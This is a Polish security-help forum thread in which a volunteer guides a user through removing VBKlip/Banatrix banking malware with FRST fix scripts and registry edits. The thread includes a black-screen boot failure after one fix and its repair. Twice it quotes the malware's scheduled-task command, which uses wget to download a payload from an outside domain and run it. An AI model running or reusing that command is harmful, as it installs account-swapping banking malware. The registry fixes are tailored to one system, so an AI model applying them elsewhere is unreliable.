Skocz do zawartości
WAŻNE - Użytkownicy uprawnieni do pomocy
WAŻNE - Zakładanie tematu: obowiązkowe logi
Nadchodzące zmiany w logowaniu

Pomoc w usunięciu VBKlip / Banatrix

erkam

Przez erkam
w Dział pomocy doraźnej

Rekomendowane odpowiedzi

erkam

erkam

Opublikowano
Opublikowano

Witam,

 

VBKlip 2.0 / Banatrix

Załapałem tego wirusa (złośliwe oprogramowanie?) najprawdopodobniej przy aktualizacji javy albo adobe playera, podszył się pod któryś z nich...

 

Efekt jest taki, że podmienia mi rachunek bankowy przy próbie przelewu. Na szczęście zauważyłem przed autoryzacją, tak więc pieniędzy nie straciłem.

Ale chcę się pozbyć drania :-)

 

Pozdrawiam

 

 

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
picasso

picasso

Opublikowano
Opublikowano

Czy na pewno były czytane tutejsze zasady działu? Kiedy został pobrany FRST? Posługujesz się wersją z 1 grudnia, najnowszy FRST jest z wczoraj. Ponadto, brak całego zestawu logów i nie ma obowiązowego GMER.

 

Wspominana infekcja jest w systemie, ładuje się przez Harmonogram zadań:

  

Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp

==================== One Month Modified Files and Folders =======

2014-12-04 10:58 - 2014-10-26 11:19 - 00000000 _____ () C:\ProgramData\dat.bmp
2014-11-15 18:03 - 2014-10-26 11:07 - 00332800 _____ () C:\ProgramData\wget.exe

 

 

Wdróż następujące działania:

 

1. Zaktualizuj FRST do najnowszej wersji: KLIK. Otwórz Notatnik i wklej w nim:

  

CloseProcesses:
Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp
S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X]
S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X]
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3833150328-1824991979-3301933300-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=170
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\ProgramData\McAfee
C:\ProgramData\TuneUp Software
C:\Users\AiR\AppData\Roaming\TuneUp Software
C:\Windows\system32\authuitu.dll
C:\Windows\system32\TURegOpt.exe
C:\Windows\system32\uxtuneup.dll
CMD: dir /a C:\ProgramData
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Oprogramowanie TuneUp nie zostało całkowicie odinstalowane. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei dwa ukryte wpisy TuneUp Utilities 2014 > Dalej.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Ponadto, w Firefox jest niejasny dodatek o nieznajdowanym na Google identyfikatorze, czy kojarzysz instalację (podaj link skąd):

  

FF Extension: Firefox Google Search - C:\Users\AiR\AppData\Roaming\Mozilla\Firefox\Profiles\jb286bnm.default\Extensions\jid1-ruV7VAC61k9bqA@jetpack.xpi [2014-11-12]

 

Odnośnik do komentarza
erkam

erkam

Opublikowano
  • Autor
Opublikowano

Coś poszło nie tak...

 

Ściągnąłem nowego FRST, skopiowałem i zapisałem fixlist w txt, uruchomiłem, poczekałem do końca i zresetowałem. No i system już nie wstał, niby się uruchamia i potem czarny ekran (w trybie awaryjnym też). Po włożeniu płytki instalacyjnej windowsa chce od razu instalować nowy system (nie pyta czy naprawić).

 

Załączam Fixlog, może coś z niego wyczytasz...

 

Na razie przygotowuję się do ponownej instalacji windowsa...

 

 

Fixlog.txt

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano
Cytat

No i system już nie wstał, niby się uruchamia i potem czarny ekran (w trybie awaryjnym też). Po włożeniu płytki instalacyjnej windowsa chce od razu instalować nowy system (nie pyta czy naprawić).

 

Nie wiem o co chodzi, Fix nie przedstawia żadnych innych operacji niż zadane. Czy działa Ostatnia poprawna konfiguracja? Czy da się zrobić log FRST z poziomu środowiska zewnętrznego: KLIK?

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano

Skan FRST nic nie widzi, ale wiem już gdzie jest usterka i jak to naprawić - naprawa jest wbrew pozorom prosta i nie rób przypadkiem reinstalacji. Plik authuitu.dll modyfikuje klasę Authentication UI Logon UI zamieniając odnośnik do systemowej biblioteki na własny. W związku z tym poproszę o dodatkowe skany przed próbą korekty wpisów rejestru. Otwórz Notatnik i wklej w nim:

  

Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{00711705-12C5-420B-A4E5-6413F2AB3C7B} /s
Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb} /s

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Dostarcz wynikowy fixlog.txt.

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano

Tak, dokładnie jest tu ta modyfikacja. Przechodzimy do korekty:

 

1. Otwórz Notatnik i wklej w nim:

  

S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X]
S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X]
S2 UxTuneUp; %SystemRoot%\System32\uxtuneup.dll [X]
Reg: reg delete HKLM\SOFTWARE\Classes\CLSID\{00711705-12C5-420B-A4E5-6413F2AB3C7B} /f
Reg: reg delete HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb}\InprocServer32 /v {00711705-12C5-420B-A4E5-6413F2AB3C7B} /f
Reg: reg add HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb}\InprocServer32 /ve /t REG_EXPAND_SZ /d ^%SystemRoot^%\system32\authui.dll /f
Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{7986d495-ce42-4926-8afc-26dfa299cadb} /s

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Powstanie kolejny fixlog.txt - przedstaw go.

 

2. Czarny ekran powinien zniknąć. Zaloguj się do Windows i wykonaj zaległe punkty:

 

picasso napisał:


2. Oprogramowanie TuneUp nie zostało całkowicie odinstalowane. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei dwa ukryte wpisy TuneUp Utilities 2014 > Dalej.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Ponadto, w Firefox jest niejasny dodatek o nieznajdowanym na Google identyfikatorze, czy kojarzysz instalację (podaj link skąd):

  


FF Extension: Firefox Google Search - C:\Users\AiR\AppData\Roaming\Mozilla\Firefox\Profiles\jb286bnm.default\Extensions\jid1-ruV7VAC61k9bqA@jetpack.xpi [2014-11-12]

 

Odnośnik do komentarza
picasso

picasso

Opublikowano
Opublikowano

OK. Wszystkie poprzednie operacje wykonane, infekcja pomyślnie usunięta. Skoro nie rozpoznajesz tego dodatku "Firefox Google Search", to musi być coś szkodliwego. Kolejna porcja czynności:

 

1. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane dodatki Adblock Plus i Eliminator Slajdów trzeba będzie przeinstalować.

 

2. Otwórz Notatnik i wklej w nim:

  

RemoveDirectory: C:\MATS
DeleteQuarantine:

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Powstanie kolejny fixlog.txt.

 

3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...